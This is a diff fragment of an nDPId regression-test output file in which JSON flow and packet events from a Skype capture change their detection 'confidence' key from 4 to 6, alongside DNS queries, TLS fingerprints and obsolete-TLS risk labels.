00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431969642519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642519,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00kpAAEAGiqPAqAEinTh+08NsAbvs\/oHtJaFi5YAQ\/\/\/eqAAAAQEICj4ii\/AZLBpl"} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01393{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01393{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431969642969,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969642969,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6a7MAAEARi4zAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1431969643037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969643037,"pkt":"0NQSxnP1PBXCt3IOCABFAABEXycAAEARmA7AqAEiwKgBAcqnADUAMDQMD6ABAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431969643044,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643044,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjuUAAEARaFTAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431969643044,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643044,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZzYAAEARkAPAqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431969643092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969643092,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1yqcAQLnbD6CBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAgABBfOIaY="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969643092,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969643092,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643093,"flow_last_seen":1431969643093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643093,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431969643093,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643093,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi9JAAEAGs6fAqAEiF84hpsNtAbuewXptAAAAALAC\/\/+RHQAAAgQFtAEDAwUBAQgKPiKOJwAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431969643139,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969643139,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w20Yoc3insF6bqASOJBNnAAAAgQFrAQCCArsLkk6PiKOJwEDAwU="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431969643139,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969643139,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z0xAAEAGcDnAqAEiF84hpsNtAbuewXpuGKHN44AQECyklQAAAQEICj4ijlTsLkk6"} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABDNYcAAEARwa\/AqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABD3H8AAEARGrfAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431969643343,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969643343,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7eVIAAEARfezAqAEiwKgBAdR8ADUAJ+nL8sABAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} @@ -82,10 +82,10 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431969643944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643944,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYXlAAEAG9xvAqAEiQTffIcNuAbtcUOQ7AAAAALAC\/\/9\/kQAAAgQFtAEDAwUBAQgKPiKRcAAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431969643971,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969643971,"pkt":"0NQSxnP1PBXCt3IOCABFAABLW5oAAEARm5TAqAEiwKgBAeuAADUAN9PqYyoBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1431969643972,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969643972,"pkt":"0NQSxnP1PBXCt3IOCABFAABLe5YAAEARe5jAqAEiwKgBAeF+ADUAN7bIb04BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431969644054,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969644054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6xBwAAEARMyPAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXA0AAEARmyzAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 